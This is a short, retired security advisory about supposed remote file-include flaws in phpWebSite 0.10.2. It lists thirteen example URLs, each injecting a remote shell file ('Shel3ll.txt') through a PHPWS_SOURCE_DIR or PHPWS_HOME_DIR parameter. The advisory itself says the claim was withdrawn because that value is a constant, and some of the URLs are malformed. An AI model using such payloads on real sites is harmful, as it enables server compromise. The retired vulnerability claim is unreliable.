source: https://www.securityfocus.com/bid/20412/info
phpWebSite is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to compromise the application and the underlying system; other attacks are also possible.
phpWebSite version 0.10.2 is vulnerable to this issue; other versions may also be affected.
This BID is being retired. The 'PHPWS_SOURCE_DIR' is a constant and not an attacker-controlled variable.
http://www.example.com/mod/users/init.php?PHPWS_SOURCE_DIR=http://Shel3ll.txt?
http://www.example.com/mod/users/class/users.php?PHPWS_SOURCE_DIR=http://Shel3ll.txt?
http://www.example.com/mod/users/class/Cookie.php?PHPWS_SOURCE_DIR=http://Shel3ll.txt?
http://www.example.com/mod/users/class/forms.php?PHPWS_SOURCE_DIR=http://Shel3ll.txt?
http://www.example.com/mod/users/class/Groups.php?PHPWS_SOURCE_DIR=http://Shel3ll.txt?
http://www.example.com/mod/users/class/http://www.example.com/modSetting.php?PHPWS_SOURCE_DIR=http://Shel3ll.txt?
http://www.example.com/core/Calendar.php?PHPWS_SOURCE_DIR=http://Shel3ll.txt?
http://www.example.com/core/DateTime.php?PHPWS_HOME_DIR=http://Shel3ll.txt?
http://www.example.com/core/http://www.example.com/core.php?PHPWS_SOURCE_DIR=http://Shel3ll.txt?
http://www.example.com/core/ImgLibrary.php?PHPWS_SOURCE_DIR=http://Shel3ll.txt?
http://www.example.com/core/Manager.php?PHPWS_SOURCE_DIR=http://Shel3ll.txt?
http://www.example.com/core/Template.php?PHPWS_SOURCE_DIR=http://Shel3ll.txt?
http://www.example.com/core/EZform.php?PHPWS_SOURCE_DIR=http://Shel3ll.txt?